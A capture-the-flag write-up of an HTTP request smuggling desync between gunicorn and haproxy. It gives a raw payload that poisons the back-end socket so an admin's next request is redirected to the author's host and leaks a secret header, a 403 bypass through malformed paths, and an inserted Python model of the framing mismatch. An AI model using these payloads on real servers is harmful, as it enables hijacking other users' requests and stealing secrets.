Fresca Soda

Fresca soda was a pretty neat HTTP Request Smuggling challenge.

Approaching the app

The main goal here is to leak the Fresca Soda secret receipt by accessing /receipt. If we try to access it directly we, obviously, fail.

If we pay attention to the response headers we'll see the app is served by gunicorn behind haproxy, so it's worth looking for desync vulns.

Version 20.0.4 of gunicorn is vulnerable to a TE.CL desync, which means we can poison the server's sockets to tamper with other users' requests.

The server also has a /back route that redirects the client to the request's Host header. If we chain this with what we've got so far, we can turn the /back redirect into an open redirect.

The server also has a weird behaviour that allows one to bypass the 403 on /receipt: if we request receipt (without the leading /) or //receipt (double /), the restriction is bypassed, probably due to a poor regex.

The server returns 200, but we can't see the flag yet because we need a special header. A nice way of obtaining this header would be to poison the socket so that one of the admins is redirected to our server, where we can extract the header and then replay our request with it.

The exploit

GET / HTTP/1.1
Host: localhost:1080
Content-Length: 76
Sec-Websocket-Key1: x

xxxxxxxxGET /back HTTP/1.1
Host: 172.29.0.1:9001
Content-Length: 35
Foo: X

GET / HTTP/1.1
Host: localhost:1080


If we send the request above, we'll be able to combine our poisoned request, which is:

GET /back HTTP/1.1
Host: 172.29.0.1:9001
Content-Length: 35
Foo: X

with the next request to the server, so the victim's request will look like the following when parsed by the server:

GET /back HTTP/1.1
Host: 172.29.0.1:9001
Content-Length: 35
Foo: XGET / HTTP/1.1
Host: localhost:1080

:9001 is not the actual port of the redirection; it will actually redirect to port 80. The reason is that the server does something weird to the Location header of the redirect when there are two Host headers, but appending a dummy port number fixes it.
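To make the desync above concrete, here is an added model (not the challenge's or the author's code) that frames the same byte stream under two rules: a front-end that honours Content-Length, and a back-end that reads a fixed 8-byte body whenever a Sec-Websocket-Key1 header is present (an assumed rule, matching the eight "x" bytes in the payload). The sample stream is the writeup's poisoning request re-encoded with CRLF line endings, followed by a constructed victim request; where the two rules split the stream differently, a proxy/back-end pair would desync.

```python
# Added model of the two framing rules; the 8-byte Sec-Websocket-Key1 rule is an assumption.

def _parse_head(stream: bytes, pos: int):
    """Parse the request at pos; return (method, target, headers, body_start) or None if incomplete."""
    end = stream.find(b"\r\n\r\n", pos)
    if end == -1:
        return None  # a real parser would block here, waiting for more bytes
    lines = stream[pos:end].decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # a repeated header keeps its last value
    return method, target, headers, end + 4

def _body_length(headers: dict, rule: str) -> int:
    """'cl': Content-Length decides. 'wskey1': Sec-Websocket-Key1 forces an 8-byte body (assumed)."""
    if rule == "wskey1" and "sec-websocket-key1" in headers:
        return 8
    return int(headers.get("content-length", "0"))

def frame_requests(stream: bytes, rule: str) -> list:
    """Split a raw HTTP/1.1 stream into (method, target) pairs under one framing rule."""
    seen, pos = [], 0
    while pos < len(stream):
        parsed = _parse_head(stream, pos)
        if parsed is None:
            break
        method, target, headers, body_start = parsed
        seen.append((method, target))
        pos = body_start + _body_length(headers, rule)
    return seen

def ambiguous_framing(stream: bytes) -> bool:
    """True when the two rules disagree, i.e. the stream could desync a front-end/back-end pair."""
    return frame_requests(stream, "cl") != frame_requests(stream, "wskey1")

# Constructed sample: the writeup's poisoning request with CRLF line endings and a
# Content-Length computed for this encoding (the original's 76 fits its own line endings).
SMUGGLED = b"xxxxxxxxGET /back HTTP/1.1\r\nHost: 172.29.0.1:9001\r\nContent-Length: 35\r\nFoo: X"
POISON = (b"GET / HTTP/1.1\r\nHost: localhost:1080\r\nContent-Length: %d\r\n"
          b"Sec-Websocket-Key1: x\r\n\r\n" % len(SMUGGLED)) + SMUGGLED
VICTIM = b"GET / HTTP/1.1\r\nHost: localhost:1080\r\n\r\n"  # the next user's request on the socket

if __name__ == "__main__":
    stream = POISON + VICTIM
    print("front-end sees:", frame_requests(stream, "cl"))      # [('GET', '/'), ('GET', '/')]
    print("back-end sees: ", frame_requests(stream, "wskey1"))  # [('GET', '/'), ('GET', '/back')]
```

The back-end's second request carries the victim's request line inside the Foo header and a second Host header, which is exactly the parsed view shown above.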

After sending the payload, whenever an admin browses the site they will be redirected to my server, potentially leaking the header we need :)

Great! Now it's only a matter of using this header with our previous 403 bypass to dump the flag.

The final request looks like the following:

GET receipt HTTP/1.1
Host: localhost:1080
x-not-heroes-allowed: s3cr3t_h3ad3r_t0_w1n

Finally, the server responds with the flag.
